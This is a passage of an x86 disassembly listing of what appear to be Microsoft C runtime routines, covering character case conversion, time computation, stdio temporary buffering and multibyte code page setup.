; ---------------------------------------------------------------------------
loc_423B4A: ; CODE XREF: sub_423B20+21�j
mov eax, [ebp+arg_4]
movsx ecx, byte ptr [eax]
cmp ecx, 2Eh
jnz short loc_423B80
mov edx, [ebp+arg_4]
movsx eax, byte ptr [edx+1]
test eax, eax
jz short loc_423B80
mov ecx, [ebp+arg_4]
add ecx, 1
push ecx
mov edx, [ebp+arg_0]
add edx, 80h
push edx
call sub_419FA0
add esp, 8
xor eax, eax
jmp loc_423C79
; ---------------------------------------------------------------------------
loc_423B80: ; CODE XREF: sub_423B20+33�j
; sub_423B20+3E�j
mov [ebp+var_4], 0
jmp short loc_423B92
; ---------------------------------------------------------------------------
loc_423B89: ; CODE XREF: sub_423B20+152�j
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
loc_423B92: ; CODE XREF: sub_423B20+67�j
push offset a___0 ; "_.,"
mov ecx, [ebp+arg_4]
push ecx
call sub_42AC40
add esp, 8
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_423BB4
or eax, 0FFFFFFFFh
jmp loc_423C79
; ---------------------------------------------------------------------------
loc_423BB4: ; CODE XREF: sub_423B20+8A�j
mov edx, [ebp+arg_4]
add edx, [ebp+var_C]
mov al, [edx]
mov [ebp+var_8], al
cmp [ebp+var_4], 0
jnz short loc_423BEA
cmp [ebp+var_C], 40h
jge short loc_423BEA
movsx ecx, [ebp+var_8]
cmp ecx, 2Eh
jz short loc_423BEA
mov edx, [ebp+var_C]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_4191A0
add esp, 0Ch
jmp short loc_423C50
; ---------------------------------------------------------------------------
loc_423BEA: ; CODE XREF: sub_423B20+A3�j
; sub_423B20+A9�j ...
cmp [ebp+var_4], 1
jnz short loc_423C18
cmp [ebp+var_C], 40h
jge short loc_423C18
movsx edx, [ebp+var_8]
cmp edx, 5Fh
jz short loc_423C18
mov eax, [ebp+var_C]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
add edx, 40h
push edx
call sub_4191A0
add esp, 0Ch
jmp short loc_423C50
; ---------------------------------------------------------------------------
loc_423C18: ; CODE XREF: sub_423B20+CE�j
; sub_423B20+D4�j ...
cmp [ebp+var_4], 2
jnz short loc_423C4B
movsx eax, [ebp+var_8]
test eax, eax
jz short loc_423C2F
movsx ecx, [ebp+var_8]
cmp ecx, 2Ch
jnz short loc_423C4B
loc_423C2F: ; CODE XREF: sub_423B20+104�j
mov edx, [ebp+var_C]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
add ecx, 80h
push ecx
call sub_4191A0
add esp, 0Ch
jmp short loc_423C50
; ---------------------------------------------------------------------------
loc_423C4B: ; CODE XREF: sub_423B20+FC�j
; sub_423B20+10D�j
or eax, 0FFFFFFFFh
jmp short loc_423C79
; ---------------------------------------------------------------------------
loc_423C50: ; CODE XREF: sub_423B20+C8�j
; sub_423B20+F6�j ...
movsx edx, [ebp+var_8]
cmp edx, 2Ch
jnz short loc_423C5B
jmp short loc_423C77
; ---------------------------------------------------------------------------
loc_423C5B: ; CODE XREF: sub_423B20+137�j
movsx eax, [ebp+var_8]
test eax, eax
jnz short loc_423C65
jmp short loc_423C77
; ---------------------------------------------------------------------------
loc_423C65: ; CODE XREF: sub_423B20+141�j
mov ecx, [ebp+var_C]
mov edx, [ebp+arg_4]
lea eax, [edx+ecx+1]
mov [ebp+arg_4], eax
jmp loc_423B89
; ---------------------------------------------------------------------------
loc_423C77: ; CODE XREF: sub_423B20+139�j
; sub_423B20+143�j
xor eax, eax
loc_423C79: ; CODE XREF: sub_423B20+25�j
; sub_423B20+5B�j ...
mov esp, ebp
pop ebp
retn
sub_423B20 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_423C80 proc near ; CODE XREF: sub_423930+101�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_419FA0
add esp, 8
mov edx, [ebp+arg_4]
movsx eax, byte ptr [edx+40h]
test eax, eax
jz short loc_423CB8
mov ecx, [ebp+arg_4]
add ecx, 40h
push ecx
push offset a__4 ; "_"
push 2
mov edx, [ebp+arg_0]
push edx
call sub_423AD0
add esp, 10h
loc_423CB8: ; CODE XREF: sub_423C80+1C�j
mov eax, [ebp+arg_4]
movsx ecx, byte ptr [eax+80h]
test ecx, ecx
jz short loc_423CE3
mov edx, [ebp+arg_4]
add edx, 80h
push edx
push offset a__3 ; "."
push 2
mov eax, [ebp+arg_0]
push eax
call sub_423AD0
add esp, 10h
loc_423CE3: ; CODE XREF: sub_423C80+44�j
pop ebp
retn
sub_423C80 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
mov eax, [ebp+8]
sub eax, 20h
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_423D00 proc near ; CODE XREF: sub_41A870+201�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp dword_492170, 0
jnz short loc_423D27
cmp [ebp+arg_0], 61h
jl short loc_423D22
cmp [ebp+arg_0], 7Ah
jg short loc_423D22
mov eax, [ebp+arg_0]
sub eax, 20h
mov [ebp+arg_0], eax
loc_423D22: ; CODE XREF: sub_423D00+11�j
; sub_423D00+17�j
mov eax, [ebp+arg_0]
jmp short loc_423D8F
; ---------------------------------------------------------------------------
loc_423D27: ; CODE XREF: sub_423D00+B�j
push offset dword_49274C
call ds:dword_494418
cmp dword_492748, 0
jz short loc_423D59
push offset dword_49274C
call ds:dword_494414
push 13h
call sub_41BC90
add esp, 4
mov [ebp+var_4], 1
jmp short loc_423D60
; ---------------------------------------------------------------------------
loc_423D59: ; CODE XREF: sub_423D00+39�j
mov [ebp+var_4], 0
loc_423D60: ; CODE XREF: sub_423D00+57�j
mov ecx, [ebp+arg_0]
push ecx
call sub_423DA0
add esp, 4
mov [ebp+arg_0], eax
cmp [ebp+var_4], 0
jz short loc_423D81
push 13h
call sub_41BD30
add esp, 4
jmp short loc_423D8C
; ---------------------------------------------------------------------------
loc_423D81: ; CODE XREF: sub_423D00+73�j
push offset dword_49274C
call ds:dword_494414
loc_423D8C: ; CODE XREF: sub_423D00+7F�j
mov eax, [ebp+arg_0]
loc_423D8F: ; CODE XREF: sub_423D00+25�j
mov esp, ebp
pop ebp
retn
sub_423D00 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_423DA0 proc near ; CODE XREF: sub_423D00+64�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = byte ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
cmp dword_492170, 0
jnz short loc_423DCC
cmp [ebp+arg_0], 61h
jl short loc_423DC4
cmp [ebp+arg_0], 7Ah
jg short loc_423DC4
mov eax, [ebp+arg_0]
sub eax, 20h
mov [ebp+arg_0], eax
loc_423DC4: ; CODE XREF: sub_423DA0+13�j
; sub_423DA0+19�j
mov eax, [ebp+arg_0]
jmp loc_423EC7
; ---------------------------------------------------------------------------
loc_423DCC: ; CODE XREF: sub_423DA0+D�j
cmp [ebp+arg_0], 100h
jge short loc_423E13
cmp dword_442F58, 1
jle short loc_423DF1
push 2
mov ecx, [ebp+arg_0]
push ecx
call sub_41E750
add esp, 8
mov [ebp+var_10], eax
jmp short loc_423E05
; ---------------------------------------------------------------------------
loc_423DF1: ; CODE XREF: sub_423DA0+3C�j
mov edx, [ebp+arg_0]
mov eax, off_442D4C
xor ecx, ecx
mov cx, [eax+edx*2]
and ecx, 2
mov [ebp+var_10], ecx
loc_423E05: ; CODE XREF: sub_423DA0+4F�j
cmp [ebp+var_10], 0
jnz short loc_423E13
mov eax, [ebp+arg_0]
jmp loc_423EC7
; ---------------------------------------------------------------------------
loc_423E13: ; CODE XREF: sub_423DA0+33�j
; sub_423DA0+69�j
mov edx, [ebp+arg_0]
sar edx, 8
and edx, 0FFh
and edx, 0FFh
mov eax, off_442D4C
xor ecx, ecx
mov cx, [eax+edx*2]
and ecx, 8000h
test ecx, ecx
jz short loc_423E5C
mov edx, [ebp+arg_0]
sar edx, 8
and edx, 0FFh
mov [ebp+var_8], dl
mov al, byte ptr [ebp+arg_0]
mov [ebp+var_7], al
mov [ebp+var_6], 0
mov [ebp+var_4], 2
jmp short loc_423E6D
; ---------------------------------------------------------------------------
loc_423E5C: ; CODE XREF: sub_423DA0+98�j
mov cl, byte ptr [ebp+arg_0]
mov [ebp+var_8], cl
mov [ebp+var_7], 0
mov [ebp+var_4], 1
loc_423E6D: ; CODE XREF: sub_423DA0+BA�j
push 1
push 0
push 3
lea edx, [ebp+var_C]
push edx
mov eax, [ebp+var_4]
push eax
lea ecx, [ebp+var_8]
push ecx
push 200h
mov edx, dword_492170
push edx
call sub_422F40
add esp, 20h
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_423EA1
mov eax, [ebp+arg_0]
jmp short loc_423EC7
; ---------------------------------------------------------------------------
loc_423EA1: ; CODE XREF: sub_423DA0+FA�j
cmp [ebp+var_4], 1
jnz short loc_423EB1
mov eax, [ebp+var_C]
and eax, 0FFh
jmp short loc_423EC7
; ---------------------------------------------------------------------------
loc_423EB1: ; CODE XREF: sub_423DA0+105�j
mov eax, [ebp+var_C]
and eax, 0FFh
mov ecx, [ebp+var_C+1]
and ecx, 0FFh
shl ecx, 8
or eax, ecx
loc_423EC7: ; CODE XREF: sub_423DA0+27�j
; sub_423DA0+6E�j ...
mov esp, ebp
pop ebp
retn
sub_423DA0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_423ED0 proc near ; CODE XREF: sub_41ABD0+161�p
var_2C = dword ptr -2Ch
var_28 = byte ptr -28h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 2Ch
mov eax, [ebp+arg_0]
sub eax, 76Ch
mov [ebp+arg_0], eax
cmp [ebp+arg_0], 46h
jl short loc_423EF0
cmp [ebp+arg_0], 8Ah
jle short loc_423EF8
loc_423EF0: ; CODE XREF: sub_423ED0+15�j
or eax, 0FFFFFFFFh
jmp loc_423FBA
; ---------------------------------------------------------------------------
loc_423EF8: ; CODE XREF: sub_423ED0+1E�j
mov ecx, [ebp+arg_4]
mov edx, [ebp+arg_8]
add edx, dword_443FAC[ecx*4]
mov [ebp+var_2C], edx
mov eax, [ebp+arg_0]
and eax, 3
test eax, eax
jnz short loc_423F21
cmp [ebp+arg_4], 2
jle short loc_423F21
mov ecx, [ebp+var_2C]
add ecx, 1
mov [ebp+var_2C], ecx
loc_423F21: ; CODE XREF: sub_423ED0+40�j
; sub_423ED0+46�j
mov edx, [ebp+arg_0]
sub edx, 46h
imul edx, 16Dh
mov eax, [ebp+arg_0]
sub eax, 1
sar eax, 2
mov ecx, [ebp+var_2C]
add ecx, edx
lea edx, [eax+ecx-11h]
imul edx, 18h
add edx, [ebp+arg_C]
mov [ebp+var_4], edx
mov eax, [ebp+var_4]
imul eax, 3Ch
add eax, [ebp+arg_10]
imul eax, 3Ch
add eax, [ebp+arg_14]
mov [ebp+var_4], eax
call sub_42BA60
mov ecx, [ebp+var_4]
add ecx, dword_443EC8
mov [ebp+var_4], ecx
mov edx, [ebp+var_2C]
mov [ebp+var_C], edx
mov eax, [ebp+arg_0]
mov [ebp+var_14], eax
mov ecx, [ebp+arg_4]
sub ecx, 1
mov [ebp+var_18], ecx
mov edx, [ebp+arg_C]
mov [ebp+var_20], edx
cmp [ebp+arg_18], 1
jz short loc_423FAB
cmp [ebp+arg_18], 0FFFFFFFFh
jnz short loc_423FB7
cmp dword_443ECC, 0
jz short loc_423FB7
lea eax, [ebp+var_28]
push eax
call sub_42BE70
add esp, 4
test eax, eax
jz short loc_423FB7
loc_423FAB: ; CODE XREF: sub_423ED0+BA�j
mov ecx, [ebp+var_4]
add ecx, dword_443ED0
mov [ebp+var_4], ecx
loc_423FB7: ; CODE XREF: sub_423ED0+C0�j
; sub_423ED0+C9�j ...
mov eax, [ebp+var_4]
loc_423FBA: ; CODE XREF: sub_423ED0+23�j
mov esp, ebp
pop ebp
retn
sub_423ED0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_423FC0 proc near ; CODE XREF: sub_41AD60+79�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
loc_423FC9: ; CODE XREF: sub_423FC0+31�j
cmp [ebp+arg_0], 0
jnz short loc_423FED
push offset aStrNull ; "str != NULL"
push 0
push 41h
push offset a_sftbuf_c ; "_sftbuf.c"
push 2
call sub_41BF80
add esp, 14h
cmp eax, 1
jnz short loc_423FED
int 3 ; Trap to Debugger
loc_423FED: ; CODE XREF: sub_423FC0+D�j
; sub_423FC0+2A�j
xor eax, eax
test eax, eax
jnz short loc_423FC9
mov ecx, [ebp+arg_0]
mov [ebp+var_4], ecx
mov edx, [ebp+var_4]
mov eax, [edx+10h]
push eax
call sub_4271D0
add esp, 4
test eax, eax
jnz short loc_424013
xor eax, eax
jmp loc_424110
; ---------------------------------------------------------------------------
loc_424013: ; CODE XREF: sub_423FC0+4A�j
cmp [ebp+var_4], offset dword_442FA0
jnz short loc_424025
mov [ebp+var_8], 0
jmp short loc_42403E
; ---------------------------------------------------------------------------
loc_424025: ; CODE XREF: sub_423FC0+5A�j
cmp [ebp+var_4], offset dword_442FC0
jnz short loc_424037
mov [ebp+var_8], 1
jmp short loc_42403E
; ---------------------------------------------------------------------------
loc_424037: ; CODE XREF: sub_423FC0+6C�j
xor eax, eax
jmp loc_424110
; ---------------------------------------------------------------------------
loc_42403E: ; CODE XREF: sub_423FC0+63�j
; sub_423FC0+75�j
mov ecx, dword_492154
add ecx, 1
mov dword_492154, ecx
mov edx, [ebp+var_4]
mov eax, [edx+0Ch]
and eax, 10Ch
test eax, eax
jz short loc_424063
xor eax, eax
jmp loc_424110
; ---------------------------------------------------------------------------
loc_424063: ; CODE XREF: sub_423FC0+9A�j
mov ecx, [ebp+var_8]
cmp dword_492188[ecx*4], 0
jnz short loc_4240CA
push 5Eh
push offset a_sftbuf_c ; "_sftbuf.c"
push 2
push 1000h
call sub_416A30
add esp, 10h
mov edx, [ebp+var_8]
mov dword_492188[edx*4], eax
mov eax, [ebp+var_8]
cmp dword_492188[eax*4], 0
jnz short loc_4240CA
mov ecx, [ebp+var_4]
add ecx, 14h
mov edx, [ebp+var_4]
mov [edx+8], ecx
mov eax, [ebp+var_4]
mov ecx, [ebp+var_4]
mov edx, [ecx+8]
mov [eax], edx
mov eax, [ebp+var_4]
mov dword ptr [eax+18h], 2
mov ecx, [ebp+var_4]
mov dword ptr [ecx+4], 2
jmp short loc_4240F9
; ---------------------------------------------------------------------------
loc_4240CA: ; CODE XREF: sub_423FC0+AE�j
; sub_423FC0+DB�j
mov edx, [ebp+var_4]
mov eax, [ebp+var_8]
mov ecx, dword_492188[eax*4]
mov [edx+8], ecx
mov edx, [ebp+var_4]
mov eax, [ebp+var_4]
mov ecx, [eax+8]
mov [edx], ecx
mov edx, [ebp+var_4]
mov dword ptr [edx+18h], 1000h
mov eax, [ebp+var_4]
mov dword ptr [eax+4], 1000h
loc_4240F9: ; CODE XREF: sub_423FC0+108�j
mov ecx, [ebp+var_4]
mov edx, [ecx+0Ch]
or edx, 1102h
mov eax, [ebp+var_4]
mov [eax+0Ch], edx
mov eax, 1
loc_424110: ; CODE XREF: sub_423FC0+4E�j
; sub_423FC0+79�j ...
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_423FC0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424120 proc near ; CODE XREF: sub_41AD60+A3�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
loc_424127: ; CODE XREF: sub_424120+38�j
cmp [ebp+arg_0], 0
jz short loc_424154
cmp [ebp+arg_0], 1
jz short loc_424154
push offset aFlag0Flag1 ; "flag == 0 || flag == 1"
push 0
push 0A1h
push offset a_sftbuf_c ; "_sftbuf.c"
push 2
call sub_41BF80
add esp, 14h
cmp eax, 1
jnz short loc_424154
int 3 ; Trap to Debugger
loc_424154: ; CODE XREF: sub_424120+B�j
; sub_424120+11�j ...
xor eax, eax
test eax, eax
jnz short loc_424127
mov ecx, [ebp+arg_4]
mov [ebp+var_4], ecx
cmp [ebp+arg_0], 0
jz short loc_4241AD
mov edx, [ebp+var_4]
mov eax, [edx+0Ch]
and eax, 1000h
test eax, eax
jz short loc_4241AD
mov ecx, [ebp+var_4]
push ecx
call sub_421580
add esp, 4
mov edx, [ebp+var_4]
mov eax, [edx+0Ch]
and ah, 0EEh
mov ecx, [ebp+var_4]
mov [ecx+0Ch], eax
mov edx, [ebp+var_4]
mov dword ptr [edx+18h], 0
mov eax, [ebp+var_4]
mov dword ptr [eax], 0
mov ecx, [ebp+var_4]
mov dword ptr [ecx+8], 0
loc_4241AD: ; CODE XREF: sub_424120+44�j
; sub_424120+53�j
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_424120 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4241C0 proc near ; CODE XREF: sub_4249A0+E�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1A = byte ptr -1Ah
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28h
push 19h
call sub_41BC90
add esp, 4
mov eax, [ebp+arg_0]
push eax
call sub_424510
add esp, 4
mov [ebp+arg_0], eax
mov ecx, [ebp+arg_0]
cmp ecx, dword_492524
jnz short loc_4241FB
push 19h
call sub_41BD30
add esp, 4
xor eax, eax
jmp loc_424500
; ---------------------------------------------------------------------------
loc_4241FB: ; CODE XREF: sub_4241C0+28�j
cmp [ebp+arg_0], 0
jnz short loc_42421C
call sub_4245F0
call sub_424670
push 19h
call sub_41BD30
add esp, 4
xor eax, eax
jmp loc_424500
; ---------------------------------------------------------------------------
loc_42421C: ; CODE XREF: sub_4241C0+3F�j
mov [ebp+var_4], 0
jmp short loc_42422E
; ---------------------------------------------------------------------------
loc_424225: ; CODE XREF: sub_4241C0:loc_42437A�j
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
loc_42422E: ; CODE XREF: sub_4241C0+63�j
cmp [ebp+var_4], 5
jnb loc_42437F
mov eax, [ebp+var_4]
imul eax, 30h
mov ecx, dword_4434E0[eax]
cmp ecx, [ebp+arg_0]
jnz loc_42437A
mov [ebp+var_24], 0
jmp short loc_42425F
; ---------------------------------------------------------------------------
loc_424256: ; CODE XREF: sub_4241C0+B2�j
mov edx, [ebp+var_24]
add edx, 1
mov [ebp+var_24], edx
loc_42425F: ; CODE XREF: sub_4241C0+94�j
cmp [ebp+var_24], 101h
jnb short loc_424274
mov eax, [ebp+var_24]
mov byte_492640[eax], 0
jmp short loc_424256
; ---------------------------------------------------------------------------
loc_424274: ; CODE XREF: sub_4241C0+A6�j
mov [ebp+var_C], 0
jmp short loc_424286
; ---------------------------------------------------------------------------
loc_42427D: ; CODE XREF: sub_4241C0:loc_424302�j
mov ecx, [ebp+var_C]
add ecx, 1
mov [ebp+var_C], ecx
loc_424286: ; CODE XREF: sub_4241C0+BB�j
cmp [ebp+var_C], 4
jnb short loc_424307
mov edx, [ebp+var_4]
imul edx, 30h
mov eax, [ebp+var_C]
lea ecx, dword_4434F0[edx+eax*8]
mov [ebp+var_8], ecx
jmp short loc_4242AA
; ---------------------------------------------------------------------------
loc_4242A1: ; CODE XREF: sub_4241C0:loc_424300�j
mov edx, [ebp+var_8]
add edx, 2
mov [ebp+var_8], edx
loc_4242AA: ; CODE XREF: sub_4241C0+DF�j
mov eax, [ebp+var_8]
xor ecx, ecx
mov cl, [eax]
test ecx, ecx
jz short loc_424302
mov edx, [ebp+var_8]
xor eax, eax
mov al, [edx+1]
test eax, eax
jz short loc_424302
mov ecx, [ebp+var_8]
xor edx, edx
mov dl, [ecx]
mov [ebp+var_24], edx
jmp short loc_4242D6
; ---------------------------------------------------------------------------
loc_4242CD: ; CODE XREF: sub_4241C0+13E�j
mov eax, [ebp+var_24]
add eax, 1
mov [ebp+var_24], eax
loc_4242D6: ; CODE XREF: sub_4241C0+10B�j
mov ecx, [ebp+var_8]
xor edx, edx
mov dl, [ecx+1]
cmp [ebp+var_24], edx
ja short loc_424300
mov eax, [ebp+var_24]
mov ecx, [ebp+var_C]
mov dl, byte_492641[eax]
or dl, byte_4434D8[ecx]
mov eax, [ebp+var_24]
mov byte_492641[eax], dl
jmp short loc_4242CD
; ---------------------------------------------------------------------------
loc_424300: ; CODE XREF: sub_4241C0+121�j
jmp short loc_4242A1
; ---------------------------------------------------------------------------
loc_424302: ; CODE XREF: sub_4241C0+F3�j
; sub_4241C0+FF�j
jmp loc_42427D
; ---------------------------------------------------------------------------
loc_424307: ; CODE XREF: sub_4241C0+CA�j
mov ecx, [ebp+arg_0]
mov dword_492524, ecx
mov dword_49253C, 1
mov edx, dword_492524
push edx
call sub_424570
add esp, 4
mov dword_492744, eax
mov [ebp+var_C], 0
jmp short loc_424340
; ---------------------------------------------------------------------------
loc_424337: ; CODE XREF: sub_4241C0+1A2�j
mov eax, [ebp+var_C]
add eax, 1
mov [ebp+var_C], eax
loc_424340: ; CODE XREF: sub_4241C0+175�j
cmp [ebp+var_C], 6
jnb short loc_424364
mov ecx, [ebp+var_4]
imul ecx, 30h
mov edx, [ebp+var_C]
mov eax, [ebp+var_C]
mov cx, word_4434E4[ecx+eax*2]
mov word_492530[edx*2], cx
jmp short loc_424337
; ---------------------------------------------------------------------------
loc_424364: ; CODE XREF: sub_4241C0+184�j
call sub_424670
push 19h
call sub_41BD30
add esp, 4
xor eax, eax
jmp loc_424500
; ---------------------------------------------------------------------------
loc_42437A: ; CODE XREF: sub_4241C0+87�j
jmp loc_424225
; ---------------------------------------------------------------------------
loc_42437F: ; CODE XREF: sub_4241C0+72�j
lea edx, [ebp+var_20]
push edx
mov eax, [ebp+arg_0]
push eax
call ds:dword_49447C
cmp eax, 1
jnz loc_4244D2
mov [ebp+var_24], 0
jmp short loc_4243A8
; ---------------------------------------------------------------------------
loc_42439F: ; CODE XREF: sub_4241C0+1FB�j
mov ecx, [ebp+var_24]
add ecx, 1
mov [ebp+var_24], ecx
loc_4243A8: ; CODE XREF: sub_4241C0+1DD�j
cmp [ebp+var_24], 101h
jnb short loc_4243BD
mov edx, [ebp+var_24]
mov byte_492640[edx], 0
jmp short loc_42439F
; ---------------------------------------------------------------------------
loc_4243BD: ; CODE XREF: sub_4241C0+1EF�j
mov eax, [ebp+arg_0]
mov dword_492524, eax
mov dword_492744, 0
cmp [ebp+var_20], 1
jbe loc_42448E
lea ecx, [ebp+var_1A]
mov [ebp+var_28], ecx
jmp short loc_4243EA
; ---------------------------------------------------------------------------
loc_4243E1: ; CODE XREF: sub_4241C0:loc_42443A�j
mov edx, [ebp+var_28]
add edx, 2
mov [ebp+var_28], edx
loc_4243EA: ; CODE XREF: sub_4241C0+21F�j
mov eax, [ebp+var_28]
xor ecx, ecx
mov cl, [eax]
test ecx, ecx
jz short loc_42443C
mov edx, [ebp+var_28]
xor eax, eax
mov al, [edx+1]
test eax, eax
jz short loc_42443C
mov ecx, [ebp+var_28]
xor edx, edx
mov dl, [ecx]
mov [ebp+var_24], edx
jmp short loc_424416
; ---------------------------------------------------------------------------
loc_42440D: ; CODE XREF: sub_4241C0+278�j
mov eax, [ebp+var_24]
add eax, 1
mov [ebp+var_24], eax
loc_424416: ; CODE XREF: sub_4241C0+24B�j
mov ecx, [ebp+var_28]
xor edx, edx
mov dl, [ecx+1]
cmp [ebp+var_24], edx
ja short loc_42443A
mov eax, [ebp+var_24]
mov cl, byte_492641[eax]
or cl, 4
mov edx, [ebp+var_24]
mov byte_492641[edx], cl
jmp short loc_42440D
; ---------------------------------------------------------------------------
loc_42443A: ; CODE XREF: sub_4241C0+261�j
jmp short loc_4243E1
; ---------------------------------------------------------------------------
loc_42443C: ; CODE XREF: sub_4241C0+233�j
; sub_4241C0+23F�j
mov [ebp+var_24], 1
jmp short loc_42444E
; ---------------------------------------------------------------------------
loc_424445: ; CODE XREF: sub_4241C0+2AC�j
mov eax, [ebp+var_24]
add eax, 1
mov [ebp+var_24], eax
loc_42444E: ; CODE XREF: sub_4241C0+283�j
cmp [ebp+var_24], 0FFh
jnb short loc_42446E
mov ecx, [ebp+var_24]
mov dl, byte_492641[ecx]
or dl, 8
mov eax, [ebp+var_24]
mov byte_492641[eax], dl
jmp short loc_424445
; ---------------------------------------------------------------------------
loc_42446E: ; CODE XREF: sub_4241C0+295�j
mov ecx, dword_492524
push ecx
call sub_424570
add esp, 4
mov dword_492744, eax
mov dword_49253C, 1
jmp short loc_424498
; ---------------------------------------------------------------------------
loc_42448E: ; CODE XREF: sub_4241C0+213�j
mov dword_49253C, 0
loc_424498: ; CODE XREF: sub_4241C0+2CC�j
mov [ebp+var_C], 0
jmp short loc_4244AA
; ---------------------------------------------------------------------------
loc_4244A1: ; CODE XREF: sub_4241C0+2FD�j
mov edx, [ebp+var_C]
add edx, 1
mov [ebp+var_C], edx
loc_4244AA: ; CODE XREF: sub_4241C0+2DF�j
cmp [ebp+var_C], 6
jnb short loc_4244BF
mov eax, [ebp+var_C]
mov word_492530[eax*2], 0
jmp short loc_4244A1
; ---------------------------------------------------------------------------
loc_4244BF: ; CODE XREF: sub_4241C0+2EE�j
call sub_424670
push 19h
call sub_41BD30
add esp, 4
xor eax, eax
jmp short loc_424500
; ---------------------------------------------------------------------------
loc_4244D2: ; CODE XREF: sub_4241C0+1D0�j
cmp dword_492190, 0
jz short loc_4244F3
call sub_4245F0
call sub_424670
push 19h
call sub_41BD30
add esp, 4
xor eax, eax
jmp short loc_424500
; ---------------------------------------------------------------------------
loc_4244F3: ; CODE XREF: sub_4241C0+319�j
push 19h
call sub_41BD30
add esp, 4
or eax, 0FFFFFFFFh
loc_424500: ; CODE XREF: sub_4241C0+36�j
; sub_4241C0+57�j ...
mov esp, ebp
pop ebp
retn
sub_4241C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424510 proc near ; CODE XREF: sub_4241C0+14�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov dword_492190, 0
cmp [ebp+arg_0], 0FFFFFFFEh
jnz short loc_424535
mov dword_492190, 1
call ds:dword_494484
jmp short loc_424567
; ---------------------------------------------------------------------------
loc_424535: ; CODE XREF: sub_424510+11�j
cmp [ebp+arg_0], 0FFFFFFFDh
jnz short loc_42454D
mov dword_492190, 1
call ds:dword_494480
jmp short loc_424567
; ---------------------------------------------------------------------------
loc_42454D: ; CODE XREF: sub_424510+29�j
cmp [ebp+arg_0], 0FFFFFFFCh
jnz short loc_424564
mov dword_492190, 1
mov eax, dword_492180
jmp short loc_424567
; ---------------------------------------------------------------------------
loc_424564: ; CODE XREF: sub_424510+41�j
mov eax, [ebp+arg_0]
loc_424567: ; CODE XREF: sub_424510+23�j
; sub_424510+3B�j ...
pop ebp
retn
sub_424510 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424570 proc near ; CODE XREF: sub_4241C0+161�p
; sub_4241C0+2B5�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
mov ecx, [ebp+var_4]
sub ecx, 3A4h
mov [ebp+var_4], ecx
cmp [ebp+var_4], 12h
ja short loc_4245BA
mov eax, [ebp+var_4]
xor edx, edx
mov dl, ds:byte_4245D4[eax]
jmp ds:off_4245C0[edx*4]
loc_42459E: ; DATA XREF: .text:off_4245C0�o
mov eax, 411h
jmp short loc_4245BC
; ---------------------------------------------------------------------------
loc_4245A5: ; CODE XREF: sub_424570+27�j
; DATA XREF: .text:004245C4�o
mov eax, 804h
jmp short loc_4245BC
; ---------------------------------------------------------------------------
loc_4245AC: ; CODE XREF: sub_424570+27�j
; DATA XREF: .text:004245C8�o
mov eax, 412h
jmp short loc_4245BC
; ---------------------------------------------------------------------------
loc_4245B3: ; CODE XREF: sub_424570+27�j
; DATA XREF: .text:004245CC�o
mov eax, 404h
jmp short loc_4245BC
; ---------------------------------------------------------------------------
loc_4245BA: ; CODE XREF: sub_424570+1A�j
; sub_424570+27�j
; DATA XREF: ...
xor eax, eax
loc_4245BC: ; CODE XREF: sub_424570+33�j
; sub_424570+3A�j ...
mov esp, ebp
pop ebp
retn
sub_424570 endp
; ---------------------------------------------------------------------------
off_4245C0 dd offset loc_42459E ; DATA XREF: sub_424570+27�r
dd offset loc_4245A5
